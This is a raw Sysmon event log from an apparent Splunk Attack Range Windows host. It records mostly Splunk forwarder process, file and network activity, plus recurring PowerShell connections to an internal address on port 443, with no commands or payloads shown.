Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3CAB79FC48221AE961AF4BD97C29264D,SHA256=8C78E3996846E9D716C6B9C8AC14AA751196AA533891A31327F8DFFC50D1C9DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.358{B81B27B7-9FF4-6140-6256-04000000C801}52564756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.162{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FF4-6140-6256-04000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.162{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.162{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.162{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.162{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.162{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9FF4-6140-6256-04000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.162{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FF4-6140-6256-04000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.143{B81B27B7-9FF4-6140-6256-04000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.123{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD89252364CA3F045C1A1A34BA74420F,SHA256=408C51C642AF0D20B7DE6AED57BD7A49D12EFAEF83C719F2536AF2022B8571BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:53.787{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50439-false10.0.1.12-8000- 23542300x800000000000000036496680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:25.189{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECD7D06F96EC7962B25374BEC5C9B9D3,SHA256=159AB0457DA79A986AD1464305B2103DECFBF8B173A3FED75DA54CDF5E69A4CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:25.189{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79787A6E962541CB81C2170AA779F7C7,SHA256=AF7434E4D24E71D90E10B422D2610CC0F6AA00FEE637DC49597C24792A16F11A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:25.142{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB5E9D006E87AE4D0F17844C3FA8F08B,SHA256=F630F7B4D2B5F98E41BFB437ED26DCFB448857D28C2D4ED9E0A9EE0DE9DF16F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:55.339{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50440-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:26.172{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44F998A75FCEEF0D42387C2526410509,SHA256=3A17B7AA1A8B7EA6ADAB839B008293325D0C79ACD75E0F4B2E783924B1671EF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:27.202{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E93676A53A05741C6243DFF4AC79F012,SHA256=8CEBFA81C6FC91F6D4622785F9B73EB0A805F1B0D80661D09A9B837FABE2E39D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:28.738{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7737AA6ACCAFD97C856025F2690A85DB,SHA256=DDA3F57BE8DAA8FF90801C623B0FA854F6B862452DE44DC2D29E3097BFAAB5BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:28.220{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ECB782B258F9BE78615252226EA6C12,SHA256=CF6349F0CC32248F9FBE41E559D700E034AF86BA9F859A4D3E1CC2E15309AC7F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:29.300{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85C43AEB8EFE84FB25C7F72124069339,SHA256=DE5C275BFA33F6E03E4E1DE6679DAE32CC2BDAF9087AEA99D8C63C285DE4FF2A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:59.352{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50441-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:30.317{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78E1E2B942220AB0109C939D6F4AE8CF,SHA256=B2CF7B4468B405A5399A20B60164F861630F0F85C9E562E7152F2838FE0D3005,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:59.798{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50442-false10.0.1.12-8000- 23542300x800000000000000036496689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:31.336{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F429645935C148577DC977EEB77ECC7A,SHA256=059A4A8C85FA56D969A552D5697A1742FF741E1A78C6FB3E1FF064F6A0315F61,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:32.918{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A3AD682558710FE5C25CDF7A47EF9144,SHA256=F1DC4C3F9457D1437D77D0F12A36BE86FB11841682307D87B1F9BCB142641D62,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:32.437{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:32.353{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBD69805D8D4E4B37096866869D843F4,SHA256=599EB841A33463AE13A4979E9DED7B71E5F5327A61023984602CD11477DD9CE4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:33.368{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4A26B88AD0453E95196443E555F6BBA,SHA256=7073B4099C345C6022405C5D5A705B9F158AF0F8DF0D6A6A644A07328F0A211A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:03.364{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50443-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:34.382{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22F6C02FCA068A40F2354A200CECE778,SHA256=DA3613FAA4BF59705FD2411821E53141BCF123CE646113980A7970412A6BB92A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:04.100{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50444-false10.0.1.12-8089- 23542300x800000000000000036496698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:35.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=618F415E2918A2856AD04514BEC40F64,SHA256=B7158B2958DBAB15939918C2FF6925497132358C48CE92AB7146D78F0DA3AB8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:04.849{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50445-false10.0.1.12-8000- 23542300x800000000000000036496699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:36.412{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2938E3B9BFFC29B452CD76420C0A278,SHA256=DDFF3E99AD4E7CCC4153505B5EBEB05A0A747EDDBA1C28CBE82D2529577BA349,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:37.893{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A001-6140-6456-04000000C801}6000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:37.893{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:37.893{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:37.893{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:37.893{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:37.893{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A001-6140-6456-04000000C801}6000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:37.893{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A001-6140-6456-04000000C801}6000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 